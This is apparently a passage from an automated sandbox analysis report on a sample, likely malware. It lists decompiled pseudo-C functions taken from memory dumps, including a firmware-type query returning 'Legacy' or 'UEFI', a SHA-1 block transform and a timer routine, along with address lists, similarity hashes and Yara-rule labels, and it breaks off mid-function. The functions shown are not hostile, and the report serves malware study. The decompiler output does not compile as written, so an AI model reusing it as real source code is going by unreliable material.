					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E038C53CA(0);
						return E0389D130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E0388F3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E03863690(1, _t117, 0x3821810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E0388AA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L03864620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E0388AA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E038C500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E03889860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}

0x038c51be
0x038c51c3
0x038c51c8
0x038c51cd
0x038c51d0
0x038c51d3
0x038c51d8
0x038c51db
0x038c51de
0x038c51e0
0x038c51e3
0x038c51e6
0x038c51e8
0x038c5342
0x038c5351
0x038c5356
0x038c535a
0x038c5360
0x038c5363
0x038c5366
0x038c5369
0x038c5369
0x038c536b
0x038c536b
0x038c5370
0x038c53a3
0x038c53a4
0x038c53a6
0x038c53ab
0x038c53ab
0x038c53ae
0x038c53ae
0x038c53b5
0x038c53bf
0x038c53bf
0x038c5375
0x038c5396
0x038c53a0
0x038c53a0
0x00000000
0x038c5396
0x038c5377
0x038c5379
0x038c537f
0x038c538c
0x038c5390
0x00000000
0x038c5390
0x038c51ee
0x038c51f1
0x038c5301
0x038c5310
0x038c5315
0x038c5318
0x038c531b
0x038c5320
0x038c532e
0x038c5331
0x00000000
0x038c5331
0x038c5328
0x038c5329
0x00000000
0x038c5329
0x038c51fa
0x038c5235
0x038c5236
0x038c5239
0x038c523f
0x038c5240
0x038c5241
0x038c5242
0x038c5246
0x038c5247
0x038c524e
0x038c5251
0x038c5267
0x038c5269
0x038c526e
0x038c527d
0x038c527e
0x038c5281
0x038c5282
0x038c5287
0x038c5288
0x038c528a
0x038c528f
0x038c5294
0x00000000
0x00000000
0x038c529a
0x038c529c
0x038c529e
0x038c529e
0x038c52a4
0x038c52b0
0x00000000
0x00000000
0x038c52ba
0x038c52bc
0x038c52bc
0x038c52d4
0x038c52d9
0x038c52dc
0x038c52e1
0x00000000
0x00000000
0x038c52e7
0x038c52f4
0x00000000
0x038c52f4
0x038c5270
0x00000000
0x038c5270
0x038c51fc
0x038c51fd
0x038c5202
0x038c5203
0x038c5205
0x038c520a
0x038c520f
0x00000000
0x00000000
0x038c521b
0x038c5226
0x038c522b
0x038c521d
0x038c521d
0x038c5222
0x038c5222
0x038c522d
0x00000000

Strings

Legacy, xrefs: 038C5226
UEFI, xrefs: 038C521D

Memory Dump Source

Source File: 00000002.00000002.740509819.0000000003820000.00000040.00000001.sdmp, Offset: 03820000, based on PE: true

Associated: 00000002.00000002.740700423.000000000393B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.740721530.000000000393F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: a3dda2d37e4113a63db04d2a2aa06eed33c015303f86d1fdfff5396cbb6b2964
Instruction ID: 30a7e89601bba16c4569eb139e95d2956f4b56b4808cc4e4b837f9c0de324921
Opcode Fuzzy Hash: a3dda2d37e4113a63db04d2a2aa06eed33c015303f86d1fdfff5396cbb6b2964
Instruction Fuzzy Hash: AC516E71A107589FDF24DFE9C840AADBBF8FB86700F1440ADE519EB291D670E940CB10

Uniqueness

Uniqueness Score: -1.00%

Function 10419F80, Relevance: 1.7, Strings: 1, Instructions: 423
COMMONCrypto

Download Yara Rule

C-Code - Quality: 73%

			E10419F80(signed int* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				char _v304;
				signed char* _t277;
				signed int* _t278;
				signed int _t279;
				signed int _t285;
				signed int _t288;
				signed int _t292;
				signed int _t295;
				signed int _t299;
				signed int _t303;
				signed int _t305;
				signed int _t311;
				signed int _t318;
				signed int _t320;
				signed int _t323;
				signed int _t325;
				signed int _t334;
				signed int _t340;
				signed int _t341;
				signed int _t346;
				signed int _t353;
				signed int _t357;
				signed int _t358;
				signed int _t362;
				signed int _t365;
				signed int _t369;
				signed int _t370;
				signed int _t399;
				signed int _t404;
				signed int _t410;
				signed int _t413;
				signed int _t420;
				signed int _t423;
				signed int _t432;
				signed int _t434;
				signed int _t437;
				signed int _t445;
				signed int _t459;
				signed int _t462;
				signed int _t463;
				signed int _t464;
				signed int _t470;
				signed int _t478;
				signed int _t479;
				signed int* _t480;
				signed int* _t481;
				signed int _t488;
				signed int _t491;
				signed int _t496;
				signed int _t499;
				signed int _t502;
				signed int _t505;
				signed int _t506;
				signed int _t510;
				signed int _t522;
				signed int _t525;
				signed int _t532;
				void* _t536;

				_t481 = _a4;
				_t353 = 0;
				_t2 =  &(_t481[7]); // 0x1b
				_t277 = _t2;
				do {
					 *(_t536 + _t353 * 4 - 0x14c) = ((( *(_t277 - 1) & 0x000000ff) << 0x00000008 |  *_t277 & 0x000000ff) << 0x00000008 | _t277[1] & 0x000000ff) << 0x00000008 | _t277[2] & 0x000000ff;
					 *(_t536 + _t353 * 4 - 0x148) = (((_t277[3] & 0x000000ff) << 0x00000008 | _t277[4] & 0x000000ff) << 0x00000008 | _t277[5] & 0x000000ff) << 0x00000008 | _t277[6] & 0x000000ff;
					 *(_t536 + _t353 * 4 - 0x144) = (((_t277[7] & 0x000000ff) << 0x00000008 | _t277[8] & 0x000000ff) << 0x00000008 | _t277[9] & 0x000000ff) << 0x00000008 | _t277[0xa] & 0x000000ff;
					 *(_t536 + _t353 * 4 - 0x140) = (((_t277[0xb] & 0x000000ff) << 0x00000008 | _t277[0xc] & 0x000000ff) << 0x00000008 | _t277[0xd] & 0x000000ff) << 0x00000008 | _t277[0xe] & 0x000000ff;
					_t353 = _t353 + 4;
					_t277 =  &(_t277[0x10]);
				} while (_t353 < 0x10);
				_t278 =  &_v304;
				_v8 = 0x10;
				do {
					_t399 =  *(_t278 - 0x18);
					_t459 =  *(_t278 - 0x14);
					_t357 =  *(_t278 - 0x20) ^ _t278[5] ^  *_t278 ^ _t399;
					asm("rol ecx, 1");
					asm("rol ebx, 1");
					_t278[9] =  *(_t278 - 0x1c) ^ _t278[6] ^ _t278[1] ^ _t459;
					_t278[8] = _t357;
					_t318 = _t278[7] ^  *(_t278 - 0x10) ^ _t278[2];
					_t278 =  &(_t278[4]);
					asm("rol ebx, 1");
					asm("rol edx, 1");
					_t46 =  &_v8;
					 *_t46 = _v8 - 1;
					_t278[6] = _t318 ^ _t399;
					_t278[7] =  *(_t278 - 0x1c) ^  *(_t278 - 4) ^ _t357 ^ _t459;
				} while ( *_t46 != 0);
				_t320 =  *_t481;
				_t279 = _t481[1];
				_t358 = _t481[2];
				_t404 = _t481[3];
				_v12 = _t320;
				_v16 = _t481[4];
				_v8 = 0;
				do {
					asm("rol ebx, 0x5");
					_t462 = _v8;
					_t488 = _t320 + ( !_t279 & _t404 | _t358 & _t279) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x14c)) + _v16 + 0x5a827999;
					_t323 = _v12;
					asm("ror eax, 0x2");
					_v16 = _t404;
					_v12 = _t488;
					asm("rol esi, 0x5");
					_v8 = _t358;
					_t410 = _t488 + ( !_t323 & _t358 | _t279 & _t323) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x148)) + _v16 + 0x5a827999;
					_t491 = _t279;
					asm("ror ebx, 0x2");
					_v16 = _v8;
					_t362 = _v12;
					_v8 = _t323;
					_t325 = _v8;
					_v12 = _t410;
					asm("rol edx, 0x5");
					_t285 = _t410 + ( !_t362 & _t491 | _t323 & _t362) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x144)) + _v16 + 0x5a827999;
					_t413 = _v12;
					_v16 = _t491;
					asm("ror ecx, 0x2");
					_v8 = _t362;
					_v12 = _t285;
					asm("rol eax, 0x5");
					_v16 = _t325;
					_t496 = _t285 + ( !_t413 & _t325 | _t362 & _t413) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x140)) + _v16 + 0x5a827999;
					_t358 = _v12;
					_t288 = _v8;
					asm("ror edx, 0x2");
					_v8 = _t413;
					_v12 = _t496;
					asm("rol esi, 0x5");
					_v16 = _t288;
					_t279 = _v12;
					_t499 = _t496 + ( !_t358 & _t288 | _t413 & _t358) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x13c)) + _v16 + 0x5a827999;
					_t404 = _v8;
					asm("ror ecx, 0x2");
					_t463 = _t462 + 5;
					_t320 = _t499;
					_v12 = _t320;
					_v8 = _t463;
				} while (_t463 < 0x14);
				_t464 = 0x14;
				do {
					asm("rol esi, 0x5");
					asm("ror eax, 0x2");
					_v16 = _t404;
					_t502 = _t499 + (_t404 ^ _t358 ^ _t279) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x14c)) + _v16 + 0x6ed9eba1;
					_t334 = _v12;
					_v12 = _t502;
					asm("rol esi, 0x5");
					_t420 = _t502 + (_t358 ^ _t279 ^ _t334) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x148)) + _v16 + 0x6ed9eba1;
					asm("ror ebx, 0x2");
					_t505 = _t279;
					_v16 = _t358;
					_t365 = _v12;
					_v12 = _t420;
					asm("rol edx, 0x5");
					asm("ror ecx, 0x2");
					_t292 = _t420 + (_t279 ^ _t334 ^ _t365) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x144)) + _v16 + 0x6ed9eba1;
					_t423 = _v12;
					_v8 = _t334;
					_v8 = _t365;
					_v12 = _t292;
					asm("rol eax, 0x5");
					_t464 = _t464 + 5;
					_t358 = _v12;
					asm("ror edx, 0x2");
					_t146 = _t505 + 0x6ed9eba1; // 0x6ed9eb9f
					_t506 = _t292 + (_t334 ^ _v8 ^ _t423) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x154)) + _t146;
					_t295 = _v8;
					_v8 = _t423;
					_v12 = _t506;
					asm("rol esi, 0x5");
					_t404 = _v8;
					_t499 = _t506 + (_t295 ^ _v8 ^ _t358) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x150)) + _t334 + 0x6ed9eba1;
					_v16 = _t295;
					_t279 = _v12;
					asm("ror ecx, 0x2");
					_v12 = _t499;
				} while (_t464 < 0x28);
				_v8 = 0x28;
				do {
					asm("rol esi, 0x5");
					_v16 = _t404;
					asm("ror eax, 0x2");
					_t510 = ((_t358 | _t279) & _t404 | _t358 & _t279) +  *((intOrPtr*)(_t536 + _v8 * 4 - 0x14c)) + _t499 + _v16 - 0x70e44324;
					_t470 = _v12;
					_v12 = _t510;
					asm("rol esi, 0x5");
					_t340 = _v8;
					asm("ror edi, 0x2");
					_t432 = ((_t279 | _t470) & _t358 | _t279 & _t470) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x148)) + _t510 + _v16 - 0x70e44324;
					_v16 = _t358;
					_t369 = _v12;
					_v12 = _t432;
					asm("rol edx, 0x5");
					_v8 = _t279;
					_t434 = ((_t470 | _t369) & _t279 | _t470 & _t369) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x144)) + _t432 + _v16 - 0x70e44324;
					asm("ror ecx, 0x2");
					_v16 = _v8;
					_t299 = _v12;
					_v8 = _t470;
					_v12 = _t434;
					asm("rol edx, 0x5");
					asm("ror eax, 0x2");
					_t522 = ((_t369 | _t299) & _t470 | _t369 & _t299) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x140)) + _t434 + _v16 - 0x70e44324;
					_v16 = _v8;
					_t437 = _t369;
					_t358 = _v12;
					_v8 = _t437;
					_v12 = _t522;
					asm("rol esi, 0x5");
					_v16 = _v8;
					_t499 = ((_t299 | _t358) & _t437 | _t299 & _t358) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x13c)) + _t522 + _v16 - 0x70e44324;
					_t404 = _t299;
					_t279 = _v12;
					asm("ror ecx, 0x2");
					_v12 = _t499;
					_t341 = _t340 + 5;
					_v8 = _t341;
				} while (_t341 < 0x3c);
				_t478 = 0x3c;
				_v8 = 0x3c;
				do {
					asm("rol esi, 0x5");
					_t479 = _v8;
					asm("ror eax, 0x2");
					_t525 = (_t404 ^ _t358 ^ _t279) +  *((intOrPtr*)(_t536 + _t478 * 4 - 0x14c)) + _t499 + _v16 - 0x359d3e2a;
					_t346 = _v12;
					_v16 = _t404;
					_v12 = _t525;
					asm("rol esi, 0x5");
					asm("ror ebx, 0x2");
					_t445 = (_t358 ^ _t279 ^ _t346) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x148)) + _t525 + _v16 - 0x359d3e2a;
					_v16 = _t358;
					_t370 = _v12;
					_v12 = _t445;
					asm("rol edx, 0x5");
					_v16 = _t279;
					asm("ror ecx, 0x2");
					_t303 = (_t279 ^ _t346 ^ _t370) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x144)) + _t445 + _v16 - 0x359d3e2a;
					_t404 = _v12;
					_v12 = _t303;
					asm("rol eax, 0x5");
					_v16 = _t346;
					_t532 = (_t346 ^ _t370 ^ _t404) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x140)) + _t303 + _v16 - 0x359d3e2a;
					_t305 = _t370;
					_v8 = _t346;
					asm("ror edx, 0x2");
					_v8 = _t370;
					_t358 = _v12;
					_v12 = _t532;
					asm("rol esi, 0x5");
					_t478 = _t479 + 5;
					_t499 = (_t305 ^ _t404 ^ _t358) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x13c)) + _t532 + _v16 - 0x359d3e2a;
					_v16 = _t305;
					_t279 = _v12;
					asm("ror ecx, 0x2");
					_v8 = _t404;
					_v12 = _t499;
					_v8 = _t478;
				} while (_t478 < 0x50);
				_t480 = _a4;
				_t480[2] = _t480[2] + _t358;
				_t480[3] = _t480[3] + _t404;
				_t311 = _t480[4] + _v16;
				 *_t480 =  *_t480 + _t499;
				_t480[1] = _t480[1] + _t279;
				_t480[4] = _t311;
				_t480[0x17] = 0;
				return _t311;
			}

0x10419f8b
0x10419f8f
0x10419f91
0x10419f91
0x10419f94
0x10419fb6
0x10419fdc
0x1041a002
0x1041a024
0x1041a02b
0x1041a02e
0x1041a031
0x1041a03a
0x1041a040
0x1041a047
0x1041a058
0x1041a05b
0x1041a05e
0x1041a062
0x1041a064
0x1041a066
0x1041a06f
0x1041a072
0x1041a075
0x1041a080
0x1041a086
0x1041a088
0x1041a088
0x1041a08b
0x1041a08e
0x1041a08e
0x1041a093
0x1041a095
0x1041a098
0x1041a09b
0x1041a0a1
0x1041a0a4
0x1041a0a7
0x1041a0b0
0x1041a0b6
0x1041a0bf
0x1041a0ce
0x1041a0d5
0x1041a0d8
0x1041a0db
0x1041a0e4
0x1041a0e7
0x1041a0ea
0x1041a102
0x1041a109
0x1041a10b
0x1041a10e
0x1041a111
0x1041a11a
0x1041a121
0x1041a124
0x1041a127
0x1041a136
0x1041a13d
0x1041a140
0x1041a143
0x1041a14c
0x1041a156
0x1041a159
0x1041a165
0x1041a168
0x1041a16f
0x1041a172
0x1041a175
0x1041a17a
0x1041a17d
0x1041a186
0x1041a197
0x1041a19a
0x1041a19d
0x1041a1a4
0x1041a1a7
0x1041a1aa
0x1041a1ad
0x1041a1af
0x1041a1b2
0x1041a1b5
0x1041a1be
0x1041a1c3
0x1041a1c3
0x1041a1d8
0x1041a1db
0x1041a1de
0x1041a1e5
0x1041a1e8
0x1041a1eb
0x1041a200
0x1041a207
0x1041a20a
0x1041a20e
0x1041a211
0x1041a216
0x1041a219
0x1041a228
0x1041a22b
0x1041a232
0x1041a235
0x1041a238
0x1041a23b
0x1041a23e
0x1041a246
0x1041a254
0x1041a257
0x1041a25a
0x1041a25a
0x1041a261
0x1041a264
0x1041a267
0x1041a26f
0x1041a27d
0x1041a280
0x1041a287
0x1041a28a
0x1041a28d
0x1041a290
0x1041a293
0x1041a29c
0x1041a2a3
0x1041a2a3
0x1041a2a9
0x1041a2c2
0x1041a2c5
0x1041a2cc
0x1041a2cf
0x1041a2d2
0x1041a2e4
0x1041a2ee
0x1041a2f1
0x1041a2fa
0x1041a2fd
0x1041a304
0x1041a307
0x1041a30d
0x1041a320
0x1041a327
0x1041a32a
0x1041a32d
0x1041a330
0x1041a339
0x1041a33c
0x1041a34f
0x1041a352
0x1041a35c
0x1041a35f
0x1041a361
0x1041a36a
0x1041a36d
0x1041a380
0x1041a386
0x1041a389
0x1041a390
0x1041a392
0x1041a395
0x1041a398
0x1041a39b
0x1041a39e
0x1041a3a1
0x1041a3aa
0x1041a3af
0x1041a3b2
0x1041a3b2
0x1041a3c5
0x1041a3c8
0x1041a3cb
0x1041a3d2
0x1041a3d5
0x1041a3d8
0x1041a3db
0x1041a3ee
0x1041a3f1
0x1041a3fc
0x1041a3ff
0x1041a40b
0x1041a40e
0x1041a414
0x1041a417
0x1041a41a
0x1041a421
0x1041a431
0x1041a434
0x1041a43a
0x1041a43d
0x1041a444
0x1041a446
0x1041a449
0x1041a44c
0x1041a44f
0x1041a452
0x1041a459
0x1041a468
0x1041a46b
0x1041a472
0x1041a475
0x1041a478
0x1041a47b
0x1041a47e
0x1041a481
0x1041a484
0x1041a48d
0x1041a49e
0x1041a4a6
0x1041a4ac
0x1041a4af
0x1041a4b1
0x1041a4b4
0x1041a4b7
0x1041a4c4

Strings

(, xrefs: 1041A29C

Memory Dump Source

Source File: 00000002.00000002.741027971.0000000010410000.00000040.00000001.sdmp, Offset: 10410000, based on PE: true

Yara matches

Similarity

API ID:
String ID: (
API String ID: 0-3887548279
Opcode ID: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
Instruction ID: 528e58ba25bbce90f34a026c62bc898ba95dcb6d64faf79443f51333554feeb4
Opcode Fuzzy Hash: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
Instruction Fuzzy Hash: 0B022DB6E006189FDB54CF9AC8805DDFBF2FF88314F1AC1AAD859A7315D6746A418F80

Uniqueness

Uniqueness Score: -1.00%

Function 0386B944, Relevance: 1.7, APIs: 1, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E0386B944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x393d360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E03867D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E03918CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E03889E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E0388B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E0388CE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E03867D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E03918F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E0388AF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x3938628; // 0x0
								_v68 = _t77;
								_t78 =  *0x393862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0x3938628; // 0x0
							_t116 =  *0x393862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}

0x0386b94c
0x0386b956
0x0386b95c
0x0386b95e
0x0386b964
0x0386b969
0x0386b96d
0x0386b96d
0x0386b970
0x0386b974
0x0386b97a
0x0386badf
0x0386badf
0x0386bae2
0x0386bae4
0x0386bae6
0x0386baf0
0x038b2cb8
0x0386baf6
0x0386baf6
0x0386baf6
0x0386bafd
0x0386bb1f
0x0386bb1f
0x0386baff
0x0386bb00
0x0386bb00
0x0386bb03
0x0386bb03
0x0386bacb
0x0386bacf
0x0386bad0
0x0386bad1
0x0386badc
0x0386badc
0x0386b980
0x0386b980
0x0386b988
0x0386b98b
0x0386b98d
0x0386b990
0x0386b993
0x0386b999
0x0386b99b
0x0386b9a1
0x0386b9a5
0x0386b9aa
0x0386b9b0
0x0386b9bb
0x0386b9c0
0x0386b9c3
0x0386b9ca
0x0386b9cc
0x0386b9cf
0x0386b9d3
0x0386b9d7
0x0386ba94
0x0386ba94
0x0386ba98
0x0386baa3
0x038b2ccb
0x0386baa9
0x0386baa9
0x0386baa9
0x0386bab1
0x038b2cd5
0x038b2cdd
0x038b2cdd
0x0386babb
0x0386babc
0x0386bac2
0x0386bac3
0x0386bac3
0x0386bac6
0x00000000
0x0386b9dd
0x0386b9dd
0x0386b9e7
0x0386b9e7
0x0386b9ec
0x0386b9ec
0x0386b9f1
0x0386b9f5
0x0386b9fa
0x0386ba00
0x0386ba0c
0x0386ba10
0x0386ba10
0x0386ba12
0x0386ba18
0x00000000
0x00000000
0x0386bb26
0x0386bb26
0x0386ba1e
0x0386ba1e
0x0386ba23
0x0386ba25
0x0386ba2c
0x0386ba30
0x0386ba35
0x0386ba35
0x0386ba41
0x0386ba46
0x0386ba4c
0x0386ba50
0x0386ba54
0x0386ba6a
0x0386ba6e
0x0386ba70
0x0386ba74
0x0386ba78
0x0386ba7a
0x0386ba7c
0x0386ba8e
0x0386ba90
0x0386ba92
0x0386bb14
0x0386bb14
0x0386bb16
0x0386bb16
0x00000000
0x0386ba7c
0x0386bb0a
0x0386bb0d
0x00000000
0x00000000
0x00000000
0x0386bb0f

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0386B9A5

Memory Dump Source

Source File: 00000002.00000002.740509819.0000000003820000.00000040.00000001.sdmp, Offset: 03820000, based on PE: true

Associated: 00000002.00000002.740700423.000000000393B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.740721530.000000000393F000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 885266447-0
Opcode ID: 6540d43a1871cfdddca59e6c4885c618d0730be5b9ffabb49b07a4e8ee21f0cc
Instruction ID: efff4d21ccc6abfca9a8c196ab31b561396f57f5a1006214a81c8cebd8163452
Opcode Fuzzy Hash: 6540d43a1871cfdddca59e6c4885c618d0730be5b9ffabb49b07a4e8ee21f0cc
Instruction Fuzzy Hash: D0515871609345CFC721DFAAC48092AFBE9BB88618F2449AEF585DB354D731E844CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0384B171, Relevance: 1.7, APIs: 1, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E0384B171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0x391f7a8);
				E0389D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
